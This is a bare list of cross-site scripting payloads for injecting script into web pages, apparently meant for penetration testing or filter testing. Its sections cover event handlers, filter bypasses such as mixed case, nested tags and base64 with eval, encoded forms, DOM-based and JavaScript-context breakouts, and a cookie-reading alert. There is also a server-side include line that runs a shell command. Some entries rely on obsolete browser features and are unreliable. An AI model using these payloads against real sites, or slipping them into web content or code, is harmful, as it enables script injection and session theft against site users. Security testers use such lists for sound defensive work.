# Event-Based XSS Payloads
<a href="javascript:alert('XSS')">Click Me</a>
<button onclick="alert('XSS')">Click Me</button>
<div onmouseover="alert('XSS')">Hover Me</div>
<input type="text" onfocus="alert('XSS')">
<form onsubmit="alert('XSS')"><input type="submit"></form>
<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')">
<select onchange="alert('XSS')"><option>Option</option></select>

# Bypass Filtering Payloads
"><ScRiPt>alert('XSS')</sCriPt>
"><sCrIpT>alert('XSS')</ScRipt>
<scr<script>ipt>alert('XSS')</script>
</title><script>alert('XSS')</script>
<scr\00ipt>alert('XSS')</scr\00ipt>
<script src="data:text/javascript,alert('XSS')"></script>
<img src="javascript:alert('XSS')">
<a href="data:text/html,<script>alert('XSS')</script>">XSS</a>
"><iframe srcdoc="<script>alert('XSS')"></iframe>

# Attribute-Based XSS Payloads
<img src="x" onerror="alert('XSS')" />
<div style="background-image: url(javascript:alert('XSS'))">
<input type="image" src="javascript:alert('XSS')">
<a href="jAvAsCrIpT:alert('XSS')">Click Me</a>
<input type="button" value="Click" formaction="javascript:alert('XSS')">
<video src=1 onerror="alert('XSS')"></video>
<marquee onstart="alert('XSS')">XSS</marquee>
<audio src="x" onerror="alert('XSS')"></audio>

# Encoded/Obfuscated Payloads
%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
<script>alert(&#39;XSS&#39;)</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=eval(atob('YWxlcnQoJ1hTUycp'))> (Base64 encoded)
<!--#exec cmd="/bin/echo '<script>alert(1)</script>'" -->

# Advanced/Contextual XSS Payloads
"><img src=x oneonerrorrror=alert(1)//">
<img src= onerror='alert(1)' >
"><iframe src="javascript:alert('XSS')" />
<svg/onload=alert('XSS')>
"><style>@import'javascript:alert(1)';</style>
<math href="javascript:alert(1)">Click</math>
<link rel="stylesheet" href="javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
<svg><desc><![CDATA[</desc><script>alert('XSS')]]></svg>
<body background="javascript:alert('XSS')">

# DOM-Based XSS Payloads
#"><svg onload=alert('XSS')>
<script>document.write('<img src=x onerror=alert("XSS")>')</script>
<input onfocus="location='javascript:alert(1)';">
"><object data="javascript:alert(1)"></object>
<img src=# onerror="javascript:alert('XSS')" />
<a href="javascript:alert(document.cookie)">Test</a>
<input value="'';!--"<XSS>=&{()}">

# Iframe/JavaScript URI Payloads
<iframe src="javascript:alert('XSS')"></iframe>
<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>
<a href="vbscript:msgbox('XSS')">Click</a>
<img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg'%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C/svg%3E">
<form><button formaction="javascript:alert('XSS')">X</button></form>

# JavaScript Context XSS
';alert('XSS');//
';alert(String.fromCharCode(88,83,83))//
'-alert('XSS')-'
"/><script>alert('XSS')</script>"
}); alert('XSS');//
'); alert('XSS'); //

# Miscellaneous Payloads
<plaintext>alert('XSS')</plaintext>
<bgsound src="javascript:alert('XSS')">
<spacer type="text/javascript" data="alert('XSS')">
<<script>alert("XSS");//<</script>
<form><input type="submit" formaction="javascript:alert('XSS')"></form>
<meta charset="x-user-defined"><script>alert('XSS')</script>
<xss style="xss:expression(alert('XSS'))">
